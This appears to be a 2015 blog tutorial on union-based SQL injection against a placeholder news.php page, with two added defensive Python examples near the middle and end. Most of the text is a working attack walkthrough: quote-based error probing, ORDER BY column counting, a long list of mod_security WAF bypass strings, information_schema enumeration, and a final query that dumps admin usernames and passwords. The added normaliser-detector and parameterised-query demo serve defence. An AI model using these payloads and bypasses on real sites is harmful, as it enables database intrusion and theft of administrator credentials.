Friday 22 May 2015

Union based Sql with WAF Bypass


  • Union based SQL injection + WAF bypassing, by Syedmohd


Today I am going to discuss union based SQL injection and WAF bypassing techniques.
Let's start injecting.

Here Is Our Target .
http://www.targetsite.com/news.php?id=11

Add a single quote (') at the end of the URL.

http://www.targetsite.com/news.php?id=11'

We get a MySQL error.
Let's balance our query for further injecting.
Here are some comment styles from our previous tutorials.

http://www.targetsite.com/news.php?id=11--

http://www.targetsite.com/news.php?id=11--+

http://www.targetsite.com/news.php?id=11-- -

http://www.targetsite.com/news.php?id=11%23

http://www.targetsite.com/news.php?id=11;

Here is a short explanation of balancing and commenting in our injection.
After balancing our query, the next step is to count the total number of columns.

http://www.targetsite.com/news.php?id=11 order by 1--+
No error!

http://www.targetsite.com/news.php?id=11 order by 3--+
No error!

http://www.targetsite.com/news.php?id=11 order by 5--+
Again no error!

http://www.targetsite.com/news.php?id=11 order by 6--+

Here we get an error:
Unknown column '6' in 'order clause'
Now try to find our vulnerable columns.

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

If our target site is protected with a WAF, the WAF will block our query and give us a mod_security error.
So here are some WAF bypassing methods.


/*!%55NiOn*/ /*!%53eLEct*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#
%0AsEleCt
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect
%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/

Just replace the "Union Select" in the URL with one of the bypass strings above.
Let's continue our tutorial.
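As an added defensive example that is not part of the original tutorial: a small normaliser that decodes the obfuscations used in the bypass list above (percent-encoding, versioned `/*!50000 ... */` and ordinary `/**/` comments, plus and vertical-tab separators, line comments) before looking for UNION SELECT, run over constructed request lines. It does not cover every entry on the list (REVERSE() and nested comment tricks are left out); the sample lines and function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines (not from any real log). The first three
# use obfuscations listed on this page; the last two are benign.
SAMPLE_REQUESTS = [
    "GET /news.php?id=-11%20/*!50000UniON%20SeLeCt*/%201,2,3,4,5--+",
    "GET /news.php?id=-11+%55nion(%53elect+1,2,3)--+-",
    "GET /news.php?id=-11+un/**/ion+se/**/lect+1,2,3,4,5--+",
    "GET /news.php?id=11",
    "GET /news.php?id=11&title=union+of+states",
]

# UNION [ALL|DISTINCT|DISTINCTROW] SELECT, with optional "(" and whitespace.
UNION_SELECT = re.compile(
    r"\bunion(?:\s*(?:all|distinct|distinctrow))?\s*\(?\s*select\b", re.I)

def normalize(raw: str, comment_repl: str) -> str:
    """Reduce a query-string value to roughly what MySQL would parse."""
    s = raw
    for _ in range(3):                      # undo repeated percent-encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.replace("+", " ")
    # /*!50000 ... */ is executed by MySQL: keep the content, drop the markers.
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", comment_repl, s, flags=re.S)   # ordinary comments
    s = re.sub(r"(?:#|-- )[^\r\n]*", " ", s)  # line comments run to end of line
    return re.sub(r"[\s\x00\x0b]+", " ", s).lower()

def is_union_injection(raw: str) -> bool:
    # A /**/ may act as a separator or as nothing at all; test both readings.
    return any(UNION_SELECT.search(normalize(raw, r)) for r in (" ", ""))

def flag_requests(lines):
    """Return the request lines whose query string carries a UNION SELECT."""
    flagged = []
    for line in lines:
        _, _, query = line.partition("?")
        if query and is_union_injection(query):
            flagged.append(line)
    return flagged

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_REQUESTS):
        print("suspect:", hit)
```

The point is that a filter matching the raw string for "union select" misses all three obfuscated lines, while matching after normalisation catches them without flagging the benign "union of states".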

Now check the vulnerable columns. We use a minus sign ( - ) for finding vulnerable columns.
We can also check for vulnerable columns with other methods instead of just using (-).

Here are some vulnerable column checking methods with examples.

Using and 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

Using and false
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+

Using div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+

Using a minus sign
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

We will get our vulnerable columns printed on the page. 3 is our vulnerable column.
Here are some variables of MySQL:
@@version = current version
@@GLOBALVERSION = current version
user() = current user
database() = current database

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+

We can see the current version printed on the page.
The next step is to get the tables.

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--+

We can see all the tables in our primary database.
Now, if you want to get the admin details of the target site, check the table name of admin, then encode the admin table name with MySQL char() to get the columns in the admin table. Change table_name to column_name, information_schema.tables to information_schema.columns and table_schema to table_name, and replace database() with our MySQL char() admin value.

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--+

We can see the column names on the page, like id, username, pass.
To get the data from the columns, here is our final query.

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(username,0x3a,password),4,5 from admin--+
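Added example, not from the tutorial: the news.php pattern this whole walkthrough relies on, a query-string value pasted straight into the SQL text, beside the parameterised version that stops it. It uses an in-memory SQLite table with five columns as a stand-in for the target (SQLite's sqlite_version() plays the role of @@version); the table, rows and function names are constructed.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed five-column news table, matching the page's 'order by 5' result."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, "
                 "author TEXT, posted TEXT)")
    conn.execute("INSERT INTO news VALUES (11, 'Hello', 'First post', "
                 "'editor', '2015-05-22')")
    return conn

def news_vulnerable(conn, raw_id: str):
    """The pattern the tutorial exploits: the id parameter becomes SQL text."""
    sql = f"SELECT id, title, body, author, posted FROM news WHERE id={raw_id}"
    return conn.execute(sql).fetchall()

def news_fixed(conn, raw_id: str):
    """Parameter binding plus type validation: the value is data, never SQL."""
    try:
        news_id = int(raw_id)          # reject anything that is not a number
    except ValueError:
        return []
    # Binding alone already keeps the value out of the parser; int() adds
    # input validation so junk is refused instead of silently matching nothing.
    sql = "SELECT id, title, body, author, posted FROM news WHERE id=?"
    return conn.execute(sql, (news_id,)).fetchall()

# The page's "-11 Union Select 1,2,@@version,4,5--+" with sqlite_version()
# standing in for MySQL's @@version (constructed for this demo).
PAYLOAD = "-11 UNION SELECT 1,2,sqlite_version(),4,5-- "

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", news_vulnerable(conn, PAYLOAD))   # version leaks in column 3
    print("fixed:     ", news_fixed(conn, PAYLOAD))        # []
    print("fixed, ok: ", news_fixed(conn, "11"))           # the real row
```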

Author: Syedmohd
